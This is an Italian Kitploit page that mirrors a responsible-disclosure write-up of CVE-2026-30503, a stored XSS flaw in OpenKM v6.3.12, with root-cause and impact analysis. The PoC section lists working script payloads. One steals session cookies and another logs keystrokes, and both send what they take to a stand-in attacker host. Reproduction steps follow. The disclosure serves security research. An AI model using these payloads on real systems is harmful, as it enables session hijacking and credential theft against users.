Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — Divulgazione dettagliata di CVE-2026-30503, una vulnerabilità XSS memorizzata in OpenKM v6.3.12. Include analisi delle cause profonde, payload PoC, valutazione dell'impatto e raccomandazioni di remediation per ricercatori di sicurezza e penetration tester. | Kitploit
Strumenti/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Divulgazione dettagliata di CVE-2026-30503, una vulnerabilità XSS memorizzata in OpenKM v6.3.12. Include analisi delle cause profonde, payload PoC, valutazione dell'impatto e raccomandazioni di remediation per ricercatori di sicurezza e penetration tester.

Vedi Repository
83 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2026-30503 — XSS Memorizzata in OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Scoperto e segnalato da Dharmendra Kumar — Ricercatore di Sicurezza

Cybersicurezza | Penetration Testing | Ricerca di Vulnerabilità | Divulgazione Responsabile


📌 Indice

  • Panoramica
  • Dettagli CVE
  • Prodotto Affetto
  • Descrizione della Vulnerabilità
  • Analisi delle Cause Profonde
  • Impatto e Valutazione del Rischio
  • Proof of Concept (PoC)
  • Rimedi e Raccomandazioni
  • Cronologia della Divulgazione
  • Riferimenti
  • Informazioni sul Ricercatore

🔍 Panoramica

Questo repository documenta la divulgazione responsabile di CVE-2026-30503, una vulnerabilità di Cross-Site Scripting Memorizzata (Stored XSS) identificata in OpenKM v6.3.12 — un sistema di gestione documentale open-source ampiamente utilizzato in ambienti aziendali.

La vulnerabilità consente a un attaccante autenticato di iniettare JavaScript malevolo persistente nell'applicazione, che viene eseguito nel contesto del browser di qualsiasi utente (inclusi gli amministratori) che successivamente visualizza il contenuto interessato.

⚠️ Gravità: Alta | Vettore d'Attacco: Rete | Privilegi Richiesti: Bassi | Interazione Utente: Necessaria


📋 Dettagli CVE

CampoDettagli
ID CVECVE-2026-30503
ProdottoOpenKM
Versione Affettav6.3.12
Classe di VulnerabilitàCross-Site Scripting Memorizzata (Stored XSS)
CWECWE-79: Neutralizzazione Impropria dell'Input Durante la Generazione di Pagine Web
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
RicercatoreDharmendra Kumar
Tipo di DivulgazioneResponsabile / Coordinata

📦 Prodotto Affetto

OpenKM è un sistema di gestione documentale (DMS) gratuito e open-source che fornisce un'interfaccia web per la gestione, l'audit e la distribuzione di documenti aziendali. È utilizzato da aziende, enti governativi e istituzioni educative a livello globale.

  • Nome Prodotto: OpenKM Document Management System
  • Versione Affetta: v6.3.12
  • Sito Web del Venditore: https://www.openkm.com
  • Categoria: Sistema di Gestione Documentale (DMS)
  • Linguaggio/Stack: Java (JSP/Spring)

🧨 Descrizione della Vulnerabilità

Sono state scoperte multiple vulnerabilità di Cross-Site Scripting Memorizzata (Stored XSS) in OpenKM v6.3.12. Un attaccante con accesso autenticato a bassi privilegi può iniettare payload JavaScript arbitrari in uno o più campi di input. Questi payload vengono memorizzati permanentemente nel backend dell'applicazione e eseguiti automaticamente ogni volta che un utente — inclusi gli amministratori — accede alla pagina o al componente interessato.

A differenza dell'XSS Riflesso, che richiede che la vittima clicchi su un link costruito ad hoc, i payload di Stored XSS sono incorporati nell'applicazione stessa, rendendoli significativamente più pericolosi e persistenti.

Endpoint Vulnerabili

  • Campi di input controllati dall'utente nei metadati dei documenti, note o campi di denominazione
  • L'applicazione non riesce a sanificare o codificare l'input utente prima di visualizzarlo nel browser

🔬 Analisi delle Cause Profonde

La vulnerabilità deriva da tre debolezze combinate nella pipeline di gestione dell'input dell'applicazione:

Input Utente ──► [NESSUNA Validazione] ──► Memorizzato nel DB ──► [NESSUN Codifica di Output] ──► Visualizzato nel Browser ──► XSS Eseguito
DebolezzaDescrizione
❌ Validazione Input MancanteL'applicazione non limita né sanifica i caratteri speciali (<, >, ", ', ;) nei campi forniti dall'utente
❌ Codifica Output MancanteI valori memorizzati vengono visualizzati direttamente nell'HTML senza codifica in entità HTML
❌ Rendering DOM Non SicuroI dati forniti dall'utente vengono incorporati nel contesto DOM senza CSP o controlli di sanificazione

💥 Impatto e Valutazione del Rischio

Uno sfruttamento riuscito di questa vulnerabilità può portare a:

RischioDescrizione
🍪 Hijacking della SessioneRubare token di sessione autenticati tramite esfiltrazione di document.cookie
👤 Compromissione dell'AccountCompromettere account della vittima, inclusi account amministratore
🔐 Raccolta di CredenzialiIniettare moduli di phishing per catturare credenziali di accesso
📤 Esfiltrazione di DatiEstrarre silenziosamente documenti sensibili o metadati dal DMS
⚙️ Azioni Non AutorizzateEseguire operazioni privilegiate per conto della vittima (eliminare/modificare documenti)
🎯 Targeting dell'AmministratoreIl payload viene eseguito nel pannello di amministrazione quando un amministratore esamina il contenuto
🔄 Propagazione del WormUn payload XSS auto-replicante può diffondersi tra gli utenti

🧪 Proof of Concept (PoC)

⚠️ Disclaimer: Questo PoC è condiviso strettamente per scopi educativi e di ricerca sulla sicurezza secondo i principi della divulgazione responsabile. Non utilizzarlo contro sistemi di cui non si possiede la proprietà o senza esplicito permesso scritto per testarli.

Esempio di Payload (Generico)

// PoC di base — dimostra l'esecuzione dello script
<script>alert('CVE-2026-30503 - XSS di Dharmendra Kumar')</script>

// Esfiltrazione del token di sessione
<script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>

// Iniezione keylogger
<script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>

Passaggi per Riprodurre

  1. Accedere a OpenKM v6.3.12 con un account autenticato a bassi privilegi
  2. Navigare al campo di input vulnerabile (es. metadati del documento / note / campo titolo)
  3. Iniettare un payload XSS come <script>alert(document.cookie)</script>
  4. Salvare / inviare la voce
  5. Accedere come un utente diverso (o amministratore) e navigare alla risorsa interessata
  6. Osservare il payload JavaScript eseguito nel contesto del browser della vittima

🛠️ Rimedi e Raccomandazioni

Per Sviluppatori / Venditori

Scarica lo strumento